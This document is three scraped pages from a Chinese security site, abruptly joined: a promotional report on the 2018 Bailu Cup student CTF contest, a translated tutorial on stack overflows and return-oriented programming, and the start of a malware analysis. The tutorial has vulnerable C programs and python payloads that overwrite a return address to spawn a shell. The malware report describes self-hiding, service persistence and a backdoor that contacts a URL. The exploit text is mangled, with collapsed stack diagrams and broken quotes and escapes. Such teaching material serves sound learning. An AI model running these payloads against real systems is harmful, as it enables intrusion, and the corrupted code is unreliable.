柏鹭

柏鹭
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
2018年“柏鹭杯”大学生网络空间安全精英赛落幕!安胜见证他们的荣耀!
阅读量 155420 | 评论 6

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-11-27 17:45:00

竞赛官网地址:地址:http://www.bailucup.com

小姐姐喊你来美亚柏科参加“柏鹭杯”啦~:https://v.qq.com/x/page/i077502i4x3.html

11月24日-25日,2018年“柏鹭杯”大学生网络空间安全精英赛在厦门市美亚柏科培训中心隆重举行!
如今,大赛已圆满落幕,参赛队员们也已安全返校,回归校园生活。但各大媒体对于此次大赛的关注与报道依然热度不减!
昨晚(11月29日)18:30-19:00,中国教育电视台1频道(CETV1)播出的新闻栏目—《全国教育新闻联播》报道了此次大赛~
错过首播的小伙伴们不要沮丧,安仔为大家留存了今日份的视频播报。

链接:https://v.qq.com/x/page/n0805bghf0m.html
此次大赛由厦门大学和美亚柏科联合主办,安胜承办!
厦门本土的赛事,本地媒体岂能不关注?
大赛结束后,厦视二套已于11月26日晚21:00特区新闻广场进行了赛事报道:

链接:https://v.qq.com/x/page/v0805a2bbxn.html
海西晨报、海峡导报、厦门日报等各大纸媒也争相报道,不信?请看这里~

海西晨报

海峡导报

厦门日报

爱上网的小伙伴发现,网上报道也挺多!不只有新浪、今日头条等门户网站,更有FreeBuf、安全客等行业网站……

网媒报道

咦!我有在厦广早新闻上听到“柏鹭杯”的赛事报道,是我听错了吗?经常开车出行的小伙伴们提出了疑问,不要怀疑你的耳朵,你,没有听错!厦门新闻广播也播报了此次赛事呢~
感谢大家对于此次赛事的关注与支持!安仔将不忘初心,继续努力,持续不断的更新优化“卧龙斋”网络安全演训一体化平台,提供更加优质的产品与服务,助力我国网安人才的培养,为网络安全事业贡献力量!

精彩回顾
CTF突围赛回顾:
2018“柏鹭杯”开赛啦!安胜带你现场走透透!

经过11月24日CTF突围赛后,比分排名前25名的队伍(并列共26名队伍)及国际战队进入AWD决赛,11月25日上午9时,这些队伍开始最后的角逐。

AWD决赛赛场

本次AWD攻防对抗模式进行了创新,一改传统的“可对堡垒机代码修改”的方式,安胜为堡垒机加装了前端WAF,客观考察防御技术,保障了竞赛的公平性、技术性和趣味性。
下午15:30,经过了两天两种竞赛方式的激烈比拼,本次竞赛最终决出了CTF突围赛的一、二、三等奖及AWD决赛的冠、亚、季军。

奖项花落谁家?

下午16:40,闭幕式正式开始,来自教育部、公安部、福建省公安厅、厦门市公安局、中国成人教育协会、中国教育电视台、厦门大学等领导、专家及各个参赛队伍指导老师出席了闭幕式。

闭幕式现场

厦门大学副校长邓朝晖表示,网络已经成为社会交往、信息交换的重要平台,网络安全形势也面临着更加严峻的挑战,人才储备是信息化发展、数字化建设的关键。相信在不久的将来,厦门大学与美亚柏科合作举办的“柏鹭杯”会逐渐成为国内靓丽的名片与重要品牌,希望更多同学了解网络空间安全、投身于网络空间安全事业中,共同成为网络空间安全人才培养的强有力支持。

厦门大学副校长邓朝晖致辞

公安部网络安全保卫局总工程师郭启全也发表了致辞。他阐述了国家网络安全保卫工作的重要性,提出网络安全专业人才培养的迫切性,希望各高校着力人才培养、人才选拔,为我国网络安全保卫提供更多高精尖人才,让我国成为世界领先的网络强国。

公安部网络安全保卫局总工程师郭启全致辞

美亚柏科副总经理、安胜执行董事、大赛总裁判长吴鸿伟宣布获奖名单,教育部、公安部、厦门大学、美亚柏科等出席领导为获奖队伍颁奖。

美亚柏科副总经理、安胜执行董事、大赛总裁判长吴鸿伟宣布获奖名单

教育部高等学校信息安全专业教学指导委员会名誉主任沈昌祥院士在为冠军颁奖后表达了对大赛的寄语:希望通过比赛能够提升学生的创新能力,提高创造性,真正能够促进网络空间安全人才培养,为国家网络安全做出应有的贡献。

教育部高等学校信息安全专业教学指导委员会名誉主任沈昌祥院士寄语

赛前准备
无论是竞赛的指导单位、主办单位、承办单位还是协办单位,对“柏鹭杯”赛事都付出努力和汗水,力求此次竞赛举办圆满成功!

美亚柏科作为主办方,为“柏鹭杯”全程提供了完备先进的赛事场地和精良的装备,同时,经验丰富的组织团队准备充分,确保了赛事的圆满举办,最终为大家呈现了一个精彩纷呈的大学生网络空间安全竞赛。

安胜作为承办方,为本次大赛提供竞技平台及技术支持,对“卧龙斋”网络安全演训一体化平台进行针对性改造与创新,保障了大赛的顺利举办。

“卧龙斋”平台比赛实时图

安胜总经理罗佳对此次赛事高度重视,在筹备期间亲临现场指导工作,并表示对赛事的成功举办充满信心,因为安胜曾承担奥运会、厦门金砖会晤等国际型会议的网络安保工作,积累了大量经验,为本次比赛出题方向、案例提供了技术积累,使其更加贴合实际工作,可为高校培养网络空间安全人才提供方向参考。

安胜总经理罗佳

大赛全体合影

2018年“柏鹭杯”大学生网络空间安全精英赛
已圆满落幕
我们明年再见!

现场赛况
开幕式于上午8:50举行,厦门大学信息科学与技术学院党委副书记李承华,美亚柏科副总经理、安胜执行董事、大赛总裁判长吴鸿伟,安胜总经理罗佳等相关领导以及各参赛队伍指导老师出席了开幕典礼。安胜科教事业部副总监廖宁主持。

开幕式现场
厦门大学信息科学与技术学院党委副书记李承华在开幕式上致辞。她表示,网络空间安全人才是国家网络安全的核心资源,大学生是未来网络安全领域竞争的主力,希望通过此次竞赛达到“以赛代练,以练促学”的目的,培养学生创新意识与团队合作精神,提升学生信息安全技术水平,促进网络空间安全学科交流,为培养、选拔、推荐优秀信息安全专业人才创造条件。

厦门大学信息科学与技术学院党委副书记李承华致辞
随后,大赛总裁判长吴鸿伟宣读比赛规则,正式宣布竞赛开始,紧张激烈的比赛拉开序幕。

美亚柏科副总经理、安胜执行董事、大赛总裁判长吴鸿伟宣布比赛开始
在今天的CTF突围赛比拼中,选手们争分夺秒快速作答,力争用最短的时间取得优异的成绩。

比赛现场
安胜作为承办方,为本次大赛提供竞赛平台及技术支持,全力保障大赛顺利举办。
“卧龙斋”网络安全演训一体化平台是一款集竞赛比武、知识培训、技能训练、仿真演练、科研测试、管理考核于一体化的网络空间安全人才培养平台。通过实践环境建设、演练学习,形成人才培养完整体系,从而实现从理论到演练实践的完美过渡。

“卧龙斋”平台特点

比赛实时图

经过8个小时的激烈角逐,CTF突围赛比分排名前25名的队伍及国际战队将晋级明天的AWD总决赛。
明天,我们将迎来AWD总决赛
赛事结果及颁奖礼也将举行
激烈角逐 谁与争锋
明天的比赛谁将夺得桂冠
让我们拭目以待!

工作花絮来一波
组织单位高度重视本次竞赛,工作人员全力支持,确保大赛有序进行!工作花絮来一波!

我们在现场

往届回顾

竞赛环境

竞赛现场美亚柏科培训中心大楼,这场考验个人专业水平,团队协作能力的竞赛即将开赛。最大Winner将花落谁家?让我们拭目以待!

十一月进入下旬,“柏鹭杯”的脚步也越来越近啦,来自北航、北邮、武汉大学、南开大学以及马来西亚等国内外高校的38支队伍将齐聚厦门。战火一触即燃,谁将问鼎?安仔期待大家以最饱满的精神、最昂扬的姿态迎接2018年“柏鹭杯”大学生网络空间安全精英赛!所有的参赛队伍,加油!

一、竞赛目的
本次竞赛旨在全面贯彻落实党中央关于网络安全工作的重大决策部署,为培养、选拔、推荐优秀网络安全专业人才创造条件,提升学生网络安全技能水平,同时,促进高等学校网络空间安全专业课程体系、教学内容和方法的改革,增强高校间网络空间安全相关学科的合作交流,培养学生的创新意识与团队合作精神,普及网络安全知识,增强学生网络安全意识。
往届回顾

二、组织机构
指导单位:
教育部高等学校信息安全专业教学指导委员会
全国大学生创新创业实践联盟
公安部网络安全保卫局
福建省教育厅
福建省公安厅
厦门大学
中国致公党厦门市委员会
主办单位:
厦门大学教务处
厦门大学现代教育技术与实践训练中心
厦门大学信息科学与技术学院
厦门市美亚柏科信息股份有限公司
承办单位:
厦门安胜网络科技有限公司
厦门大学网络空间安全系
协办单位:
厦门服云信息科技有限公司
浪潮集团
厦门大学网络与信息中心
厦门市网络空间安全产业技术创新战略联盟

三、参赛细则
时间:
11月24日-25日
地点:
美丽海滨城市——厦门
参赛对象:
大赛面向全球高校的在校研究生、本科生。
参赛组队形式:
由主办单位面向全球高校的学生团队召集参赛,每支参赛队成员不超过3人,每支参赛队配备指导教师1名,设置队长1名。

竞赛现场环境

四、竞赛赛制
突围赛:CTF解题模式
突围赛采用解题模式,参赛团队通过攻击主办方提供的比赛环境中的靶机,或通过程序分析、破译密码等形式,获取比赛题目要求的内容,并将其提交到比赛答题系统中,从而夺得分数。
根据预赛总排名决出一等奖1名、二等奖3名、三等奖5名及若干优秀奖。
国内战队排名前25名可晋级决赛,国际战队拥有决赛直通权。
总决赛:AWD攻防模式
总决赛采用AWD模式比赛形式,比赛中每个队伍维护多台服务器,服务器中存在多个漏洞,利用漏洞攻击其他队伍进行得分,修复漏洞或添加防御策略可以避免被其他队伍攻击失分。
根据竞赛结果决出冠军1名、季军2名、亚军3名。

五、奖项设置

这场考验个人专业水平
团队协作能力的竞赛
即将开赛
最大Winner将花落谁家?
让我们拭目以待!

2018年“柏鹭杯”大学生网络空间安全精英赛即将开始,你了解多少呢?
你知道竞赛由厦门市美亚柏科信息股份有限公司主办,厦门安胜网络科技有限公司与厦门服云信息科技有限公司协办吗?你知道报名还在继续,精彩不容错过吗?你知道竞赛模式是什么吗?你知道有哪些创新模式吗?
那么在“柏鹭杯”正式开始前,让我们来科普一波吧!

CTF是什么?
CTF夺旗赛(Capture The Flag),是在网络安全技术人员之间进行竞技的一种比赛形式。
CTF源于1996年“DEFCON全球黑客大会”,以CTF替代原来黑客们发起“真实攻击”的技术比拼方式。2013年全球举办了超过五十场国际性CTF赛事,已经成为全球范围网络安全圈流行的竞赛形式。
作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,堪称CTF赛场中的“世界杯” 。

解读竞赛模式
01 解题模式 Jeopardy
技术与策略缺一不可
传统的Jeopardy解题模式只是CTF中的一种模式。参赛团队通过攻击比赛靶机、程序分析、密码破译等形式,获取比赛题目要求的内容,并提交至比赛答题系统中,从而夺得分数。
解题模式的流程十分简单,很容易让人误认为是单纯的实力比拼。
但实际上这是实力与策略并重检验的一种竞赛模式,这与其主流的“动态积分制”有关。

动态积分制是什么?
所有题目具有一样的标准分,实时分数在其基础上按一定权重变动,权重与答对题目队伍数量相关。答对队伍数越多,每个队伍从该题可获得的分值也随之降低。
换言之,难度越高的题目,对队伍能力得要求越高,解题所花费时间越多,可答对得队伍数越少,分值则相对较高。
所以通过该模式选拔出的经常是“术业有专攻”的精英队伍,或者是“分类方向,各个突破”的全能型队伍。

02 攻防模式 Attack With Defence
参赛队伍在比赛设置的网络空间中,同时扮演着攻击者与防守者的角色,互相进行攻击与防守。
攻方,通过挖掘网络服务漏洞,并攻击对手服务来得分;守方,通过修补自身服务漏洞或添加防御策略,从而进行防御以避免丢分。
传统的AWD攻防模式通常是以一个SSH对应一个堡垒机,参赛者通过SSH登录自己的服务器,进行审计漏洞,从而修补漏洞进行防守,或者通过漏洞攻击其他队伍得到分数。
但也会有人制造恶意违规行为,如:
“直接关闭网络连接,关闭网络访问”
“过度修改堡垒机,导致网站不可正常访问”
“直接攻击答题平台,获取题目信息或篡改分数”
……
目前这些问题可通过规则、健康检查等方式进行规避。

但是,真正难以解决的不是这些违规行为,而是一些“不违规,却严重影响竞赛体验”的情况,如通过使用一次性脚本等现成工具,封堵赛场环境设置的堡垒机漏洞,导致环境失衡。
在某种意义上,这是单方面提前吹响了“终止哨”的行为,其他人又何来竞技体验、竞技趣味呢?
鉴于此,此次“柏鹭杯”增加WAF防御,化解了这个尴尬问题。

“柏鹭杯”创新模式

“柏鹭杯”创新模式
Q1.创新模式在流程上有何不同?

Q2:对于比赛本身有什么影响呢?
保障了比赛的持久性,加重了比赛的考验性,提升了比赛的趣味性。
持久性:赛场环境的所有漏洞永续存在,保证所有队伍的可被攻击性;
考验性:所有防守均需在漏洞审计后,编写对应防御策略(正则表达式),配置于防火墙生效,考验对漏洞和对防守规则的理解,而非仅仅的工具使用。
趣味性:平台对于防御策略设定了长度限制,不存在一条防御策略一劳永逸的情况,选手需要根据赛场情况,不断优化策略编写,增加竞赛博弈感。

活动简介
为全面贯彻落实党中央关于网络安全工作的重大决策部署。培养、选拔、推荐优秀网络安全专业人才,提升学生网络安全技能水平,促进高校间网络空间安全相关学科的合作交流。

由教育部高等学校信息安全专业教学指导委员会、福建省教育厅、福建省公安厅、中国致公党厦门市委员会、厦门大学联合指导,母公司厦门市美亚柏科信息股份有限公司主办,我司协办的2018年“柏鹭杯”大学生网络空间安全精英赛将于2018年11月24日-25日在厦门举办。

活动时间
2018年11月24日-25日

活动地点
厦门

主办方
厦门市美亚柏科信息股份有限公司

活动详情
参赛对象
全球高校在校研究生、本科生,以学校为单位组队参赛(每支参赛队伍成员≤3人)*队伍总数限制为50支,报名先到先得。

竞赛赛制
突围赛:CTF(Capture The Flag)
WEB | PWN | 逆向 | 加解密 |杂项

总决赛:AWD(Attack with Defence)
WEB | PWN

报名流程
1.关注“卧龙草堂”公众号,后台回复“柏鹭杯”获取【参赛邀请通知函】

2.点击http://www.bailucup.com,进入大赛官网获取【参赛回执表】

3.2018年11月10日24:00前请发送【参赛回执表】至组委会邮箱:bailucup@163.com

温馨提醒
1.比赛期间产生的费用(包括差旅费、住宿费、餐饮费等)由高校自行承担。
2.参赛队伍需入住指定酒店以便统一接送,相关事宜详见大赛后续通知。

来自“柏鹭杯”的七个回眸

安胜作为国内领先的网络安全类产品及服务提供商,秉承“创新为安,服务致胜”的经营理念,专注于网络安全类产品的生产与服务;以“研发+服务+销售”的经营模式,“装备+平台+服务”的产品体系,在技术研究、研发创新、产品化等方面已形成一套完整的流程化体系,为广大用户提供量体裁衣的综合解决方案!

我们拥有独立的技术及产品的预研基地—ISEC实验室,专注于网络安全前沿技术研究,提供网络安全培训、应急响应、安全检测等服务。此外,实验室打造独家资讯交流分享平台—“ISEC安全e站”,提供原创技术文章、网络安全信息资讯、实时热点独家解析等。

2018年
承担全国两会网络安保工作;
承担青岛上合峰会网络安保工作。
2017年
承担全国两会网络安保工作;
承担金砖“厦门会晤”网络安保工作;
承担北京“一带一路”国际合作高峰论坛网络安保工作;
承担中国共产党第十九次全国代表大会网络安保工作;
承担第四届世界互联网大会网络安保工作。
2016年
承担全国两会网络安保工作;
为贵阳大数据与网络安全攻防演练提供技术支持;
承担G20峰会网络安保工作;
承担第三届世界互联网大会网络安保工作。
2015年
承担第二届世界互联网大会网络安保工作。

不忘初心、砥砺前行;未来,我们将继续坚守、不懈追求,为国家网络安全事业保驾护航!

赛事彩蛋

精彩的比赛即将开始,你们准备好了吗?

商务合作,文章发布请联系 dengjinling@360.cn
活动 CTF 柏鹭杯

安胜ANSCEN 认证 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ETW注册表监控windows内核实现原理
2019-02-21 14:30:47

WordPress 5.0.0远程代码执行漏洞分析
2019-02-21 11:30:53

Lucky双平台勒索者解密分析
2019-02-21 10:45:27

off by null漏洞getshell示例
2019-02-20 16:59:40
|发表评论
发表你的评论吧
昵称
Dir溢出大神
换一个
|评论列表
悲离赋 · 2018-11-26 21:54:40 回复
决赛被打倒自闭的pwn选手

黑帽子 · 2018-11-23 09:44:10 回复
时间选的不好,跟好多比赛撞了

神奇小子 · 2018-11-08 16:43:42 回复
报名方式很坑

xy · 2018-11-22 18:41:04 回复
的确很坑,想想还是算了

kubo · 2018-11-01 15:43:29 回复
小姐姐很好看,也很想参赛,但比赛地点太远了。

安胜ANSCEN · 本文作者 · 2018-11-02 16:16:24 回复
本次大赛奖金丰厚哦~~ 小姐姐表示很想见到你呢~~ 如果方便可以回复下地点和学校哦,小姐姐协助联系哟~~

安胜ANSCEN
厦门安胜网络科技有限公司,厦门美亚柏科控股子公司,是国内领先的网络安全检测产品及服务提供商。公司拥有员工近百人,其中90%的员工本科以上学历,80%技术骨干具备多年信息安全工作经验
文章
10
粉丝
6
TA的文章
2018年网络安全行业大事记
2019-02-07 14:21:17
2018 ASTC | 第三届安胜网络安全技术峰会(2018 ASTC)圆满落幕!
2019-01-16 17:30:07
活动 | 第三届安胜网络安全技术峰会(2018 ASTC)即将启幕!
2018-11-30 18:00:58
2018年“柏鹭杯”大学生网络空间安全精英赛落幕!安胜见证他们的荣耀!
2018-11-27 17:45:00
萌新科普 手把手教你如何用MSF进行后渗透测试
2018-11-17 09:31:49
输入关键字搜索内容
相关文章
off by null漏洞getshell示例
HackIMshop的解析及学习
FireShellCTF2019 babyheap 详细题解
tcache Attack:lctf2018 easy_heap
Nullcon2019-pwn详解
HackIM 2019 Web记录
DVP新年活动 | 新年新气象,开工送福利
热门推荐
文章目录
精彩回顾
赛前准备
现场赛况
工作花絮来一波
往届回顾
竞赛环境
一、竞赛目的
二、组织机构
三、参赛细则
四、竞赛赛制
五、奖项设置
CTF是什么?
解读竞赛模式
01 解题模式 Jeopardy
02 攻防模式 Attack With Defence
“柏鹭杯”创新模式
活动简介
活动时间
活动地点
主办方
活动详情
参赛对象
竞赛赛制
报名流程
温馨提醒
来自“柏鹭杯”的七个回眸
赛事彩蛋
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66 0daybank

rop

rop
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
【技术分享】ROP技术入门教程
阅读量 198223 | 评论 2 稿费 200

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2017-03-06 15:57:38
译文声明
本文是翻译文章,文章原作者,文章来源:ketansingh.net
原文地址:https://ketansingh.net/Introduction-to-Return-Oriented-Programming-ROP/

译文仅供参考,具体内容表达以及含义原文为准

×

http://p5.qhimg.com/t0116d7fe99f831aa1e.jpg

翻译:beswing

预估稿费:200RMB

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

前言

不可否认的是,不管是CTF赛事,还是二进制漏洞利用的过程中,ROP都是一个很基础很重要的攻击技术。

这一段是译者自己加的,与原文无关。

ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。 另外译者推荐,如果想更好的学习ROP技术,可以参考蒸米大神的一步一步学ROP系列文章,请自行查找。

ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。

因为所有执行的指令来自原始程序内的可执行存储器区域,所以这避免了直接代码注入的麻烦,并绕过了用来阻止来自用户控制的存储器的指令的执行的大多数安全措施。

因此,ROP技术是可以用来绕过现有的程序内部内存的保护机制的。在学习下面的内容之前,先确保自己已经了解了基本的堆栈溢出的漏洞原理。

一个简单的经典缓冲区溢出例子

#include
#include
void vuln(){
char buffer[10];
read(0,buffer,100);
puts(buffer);
}
int main() {
vuln();
}
这个程序有明显的缓冲区溢出攻击。在vuln()函数中设置了10个字节的缓冲区,而我们读取的字节高达100个字节。read()的滥用导致了缓冲区溢出。

我们可以看看vuln函数调用时候,堆栈的情况:

ADDRESS DATA
0xbfff0000 XX XX XX XX <- buffer 0xbfff0004 XX XX XX XX 0xbfff0008 XX XX XX XX 0xbfff000c XX XX XX XX ........ 0xbfff0020 YY YY YY YY <- saved EBP address 0xbfff0024 ZZ ZZ ZZ ZZ <- return address 当缓冲区填充正确的大小时,可以修改保存的返回地址,允许攻击者控制EIP,从而允许他执行任意任意代码。 缓冲区溢出防御措施 但是,在现代的系统中,有一些防御措施可以避免被攻击: ALSR Stack Canaries NX/DEP 防御措施大概有这些内容,原文作者只是简单的介绍了一下,如果想更清晰了解,可以参考译者博客。 NX/DEP DEP表示数据执行预防,此技术将内存区域标记为不可执行。通常堆栈和堆被标记为不可执行,从而防止攻击者执行驻留在这些区域的内存中的代码。 ASLR ASLR表示地址空间层随机化。这种技术使共享库,堆栈和堆被占用的内存的地址随机化。这防止攻击者预测在哪里采取EIP,因为攻击者不知道他的恶意有效载荷的地址。 Stack Canaries 下文简称为:Canary 在这种技术中,编译器在堆栈帧的局部变量之后和保存的返回地址之前放置一个随机化保护值。在函数返回之前检查此保护,如果它不相同,然后程序退出。我们可以将它可视化为: ADDRESS DATA 0xbfff0000 XX XX XX XX <- buffer 0xbfff0004 XX XX XX XX 0xbfff0008 XX XX XX XX 0xbfff000c CC CC CC CC <- stack canary ........ 0xbfff0020 YY YY YY YY <- saved EBP address 0xbfff0024 ZZ ZZ ZZ ZZ <- return address 如果攻击者试图修改返回地址,Canayr也将不可避免地被修改。因此,在函数返回之前,检查这个Canayr,从而防止利用。 那么我们如何绕过这些防御措施呢? Return Oritented Programming (ROP编程) ROP是一个复杂的技术,允许我们绕过DEP和ALSR,但不幸的是(或对于用户来说幸运的是)这不能绕过Canary,但如果有额外的内存泄漏,我们可以通过泄露,leak canary的值和使用它。 ROP re-uses ,即我们可以重用Bin文件或者Libc文件(共享库)中的代码。这些代码,或者说指令,通常被我们称作“ROP Gadget”。 下文,我们将来分析一下,一个特殊的ROP例子,我们称作Return2PLT。应该注意的是,只有libc基地址被随机化,特定函数从其基地址的偏移总是保持不变。如果我们可以绕过共享库基地址随机化,即使ASLR打开,也可以成功利用漏洞程序。 让我们分析下,下面这个脆弱的代码 #include
#include
#include
#include
void grant() {
system(“/bin/sh”);
}
void exploitable() {
char buffer[16];
scanf(“%s”, buffer);
if(strcmp(buffer,”pwned”) == 0) grant();
else puts(“Nice tryn”);
}
int main(){
exploitable();
return 0;
}
我们上文说了,ROP技术并不能绕过Canay保护措施,所以我们编译这个程序的时候需要关闭堆栈保护程序。我们可以利用下面的命令编译。

$ gcc hack_me_2.c -o hack_me_2 -fno-stack-protector -m32

译者的程序分析

我先看看代码,再翻译作者的文章。我们看到,在exploitable()函数中,设置了16字节的缓冲区,但是值得我们注意的是scanf函数没有安全的使用,这导致我们可以写入超过16字节,这就导致了缓冲区溢出的可能。我们用注意到,有个函数调用了sytem(“/bin/sh”),这里我们就可以假设,如果我们可以操作函数调转,去调用grant()函数,我们就可以拿到shell了。 基本上思路就是这样的。

读取程序的内存映射,我们可以看到它的栈是只读/ 不可执行的。

http://p9.qhimg.com/t01319cd1bbe93bf596.png

让我们尝试控制EIP

由于scanf不执行绑定的check,因此我们可以通过覆盖函数的返回地址来指向某个已知位置来控制EIP。我会尝试指向它grant()达到getshell的目的。我们可以通过objdum工具,来获取grant()的地址。

除了利用objdump来看,当然我们还是可以用IDA查找的。

objdump命令如下

$ objdump -d ./hack_me_2 | grep grant
结果应该看起来是这样的

080484cb
8048516:e8 b0 ff ff ff call 80484cb
接下来就是写exp,达到目的了。

$(python -c’print“A”* 28 +“ xcb x84 x04 x08”’ ; cat – )| ./hack_me_2

这里译者补充几点

第一: 为什么是28个字节?这个是需要我们自己去分析的,我们需要计算两者直接字节数的值,才好控制跳转,毕竟本文是基于我们了解缓冲区溢出知识后的,如果有疑问,可以留言,或者自寻百度。

第二: 从代码来看,我们可以知道原文作者的环境是基于32位的,所以这里需要了解一下小端的知识。

运行上述代码之后,我们就可以成功getshell了。

很明显,大多数程序不会为你调用shell这个很容易,我们需要修改程序让demo更贴近现实一点。

#include
#include
#include
#include
char *shell = “/bin/sh”;
void grant() {
system(“cowsay try again”);
}
void exploitable() {
char buffer[16];
scanf(“%s”, buffer);
if(strcmp(buffer,”pwned”) == 0) grant();
else puts(“Nice tryn”);
}
int main(){
exploitable();
return 0;
}
运行先前的exp,我们发现并没有getshell,那么我们怎么去调用sysytem(“/bin/sh”)呢?

分析,这次的程序并没有直接调用 system(“/bin/sh”)了,但是漏洞产生的原理和之前的一样。就不再复述了。

调用函数约定

当反汇编我们的代码看起来像这样的:

080484cb
80484cb:55 push%ebp
80484cc:89 e5 mov%esp,%ebp
80484ce:83 ec 08 sub $ 0x8,%esp
80484d1:83 ec 0c sub $ 0xc,%esp
80484d4:68 e8 85 04 08 push $ 0x80485e8
80484d9:e8 b2 fe ff ff call 8048390 < system @ plt>
80484de:83 c4 10 add $ 0x10,%esp
80484e1:90 nop
80484e2:c9 leave
80484e3:c3 ret
080484e4
8048516:e8 b0 ff ff ff call 80484cb
804851b:eb 10 jmp 804852d
让我们简单看看每个指令的作用。

在可利用的情况下,我们调用grant()使用指令去做两件事情,推送下一个地址0x0804851b到堆栈,并更改EIP为0x080484cb 到grant()所在的地址

push %ebp
mov %esp,%ebp
这是函数的初始化。它为当前函数设置堆栈框架。它通过push之前保存的一堆栈帧的基指针,然后将当前基指针更改为堆栈指针($ ebp = $ esp)。现在grant()可以使用它的栈来存储变量和whatnot。

之后,它通过从esp中减去来为局部变量分配空间(因为堆栈增长),最后0x080485e8在调用之前将地址压入堆栈,system()它是指向将作为参数传递的字符串的指针system(),它有点像

system(*0x80485e8)
最后ret,将保存的 函数返回地址从堆栈的顶部pop出值到EIP。

构建我们自己的堆栈帧

我们已经看到了当函数被调用时堆栈的行为,这意味着

我们可以构造我们自己的堆栈帧

控制参数到我们跳转到的函数

确定此函数返回的位置

如果我们控制这两者之间的堆栈,我们可以控制返回函数的参数

通过ROP链接在多个函数中跳转

从objdump我们看到“/ bin / sh”的地址是 0x080485E0

$ objdump -s -j .rodata hack_me_3
hack_me_3: file format elf32-i386
Contents of section .rodata:
80485d8 03000000 01000200 2f62696e 2f736800 ……../bin/sh.
80485e8 636f7773 61792074 72792061 6761696e cowsay try again
80485f8 00257300 70776e65 64004e69 63652074 .%s.pwned.Nice t
8048608 72790a00
我们构造一个“假”的堆栈结构,然后修改函数的返回地址,这样的堆栈结构如下:

ADDRESS DATA
……..
// exploitable() stack
0xbfff0004 80 48 4d 90 <- return address // our frame 0xbfff0008 41 41 41 41 <- saved return pointer, system() 0xbfff000c 08 04 85 E0 <- "/bin/sh" 所以以,当函数exploitable()返回时,它返回system(),将看到它返回地址为41414141和参数为“/bin/sh”,这将产生一个shell,但是当它返回时会弹出41414141到EIP,它是一个有效的地址,我们可以ROP连接他们,只要他们不需要参数。所以,我们最后的利用代码是: $(python -c'print“A”* 28 +“ x90 x83 x04 x08”+“ x41 x41 x41 x41”+“ xE0 x85 x04 x08” | ./hack_me_3 http://p7.qhimg.com/t01a524bb035dac10cb.png 参考文献 https://sploitfun.wordpress.com/ https://blog.zynamics.com/2010/03/12/a-gentle-introduction-to-return-oriented-programming/ https://crypto.stanford.edu/~blynn/rop/ 本文翻译自 ketansingh.net, 原文链接 。如若转载请注明出处。 安全知识 beswing 分享到: QQ空间 新浪微博 微信 QQ facebook twitter |推荐阅读 ETW注册表监控windows内核实现原理 2019-02-21 14:30:47 WordPress 5.0.0远程代码执行漏洞分析 2019-02-21 11:30:53 Lucky双平台勒索者解密分析 2019-02-21 10:45:27 off by null漏洞getshell示例 2019-02-20 16:59:40 |发表评论 发表你的评论吧 昵称 神奇小子 换一个 |评论列表 白帽子 · 2018-01-29 21:23:13 5 回复 为什么这种文章都给过?审核是脑子瓦特了么???文章标题为ROP入门,但整篇文章讲的就是栈溢出入门,就最后一句提到了ROP这个单词,还有翻译也是烂的一匹,whatout你直接翻译成类似的数据不行吗??? Mickey牛 · 2018-01-02 10:46:33 回复 12345 beswing 一只二进制狗 文章 7 粉丝 3 TA的文章 Shanghai-DCTF-2017 线下攻防Pwn题 2017-12-08 18:12:56 【技术分享】电子取证技术之实战Volatility工具 2017-05-08 10:19:20 【技术分享】利用内存破坏漏洞实现 Python 沙盒逃逸 2017-04-06 10:53:26 【技术分享】现代栈溢出利用技术基础:ROP 2017-04-05 09:33:04 【漏洞分析】Firefox一个整数溢出导致的mmap区域越界写利用 2017-03-24 14:00:48 输入关键字搜索内容 相关文章 360 | 数字货币钱包APP安全威胁概况 以太坊智能合约安全入门了解一下(下) 对恶意勒索软件Samsam多个变种的深入分析 360 | 数字货币钱包安全白皮书 Json Web Token历险记 揪出底层的幽灵:深挖寄生灵Ⅱ 简单五步教你如何绕过安全狗 热门推荐 安全客Logo 安全客 安全客 关于我们 加入我们 联系我们 用户协议 商务合作 合作内容 联系方式 友情链接 内容须知 投稿须知 转载须知 合作单位 安全客 安全客 Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66 Loading...0daybank

病毒分析

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
骷髅病毒分析报告
阅读量 62684 | 评论 5

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-09-19 15:30:15

一:目录
1.样本信息
2.行为分析
3.样本分析
4.详细分析

二:样本信息
1.样本名称:样本.exe(脱壳后为样本dump.exe)
2.md5:5b8bc92296c2fa60fecc6316ad73f1e2
3.是否加壳:加壳UPX
4.编译语言:visual C++

三:行为分析
1)通过注册表判断系统是否被感染
2)获取windows目录,利用计时器实现随机命名,把病毒copy到windows目录实现隐藏
3)删除样本文件
4)创建服务,实现自启

5)链接指定url,执行后门行为。

四:详细分析
1.PEID查壳,发现是UPX加壳,ESP定律法脱去
2.病毒先将currentcontrolservices和15654656链接起来,并且利用RegOpenKey来打开这个注册表。目的是:判断这个服务是否被创建,换句话说看病毒是否在系统内存在

3.如果这个服务不存在,病毒执行405A25,打开服务管理器。然后获取windows目录,比较c://windows,接着通过GetTick来获取计数器,复制那个exe文件到windows目录。目的是实现自身的隐藏接着调用CreateService来创建病毒服务。判断服务是否开启,然后开启服务,最后,先获取获取目录信息,接着获取当前进程信息,目的是获取样本文件的信息,以便为删除做准备然后调用shellEx利用cmd执行/c del >nul删除样本文件,设置进程的优先级。以便后续为破坏做准备

4。如果这个服务存在的话,执行后续操作。
5.通过调用StartServiceCtrlDispatcher函数,执行线程

6.分析该服务线程
1)先获取例如closesocket和SDetServiceStatus等函数的地址

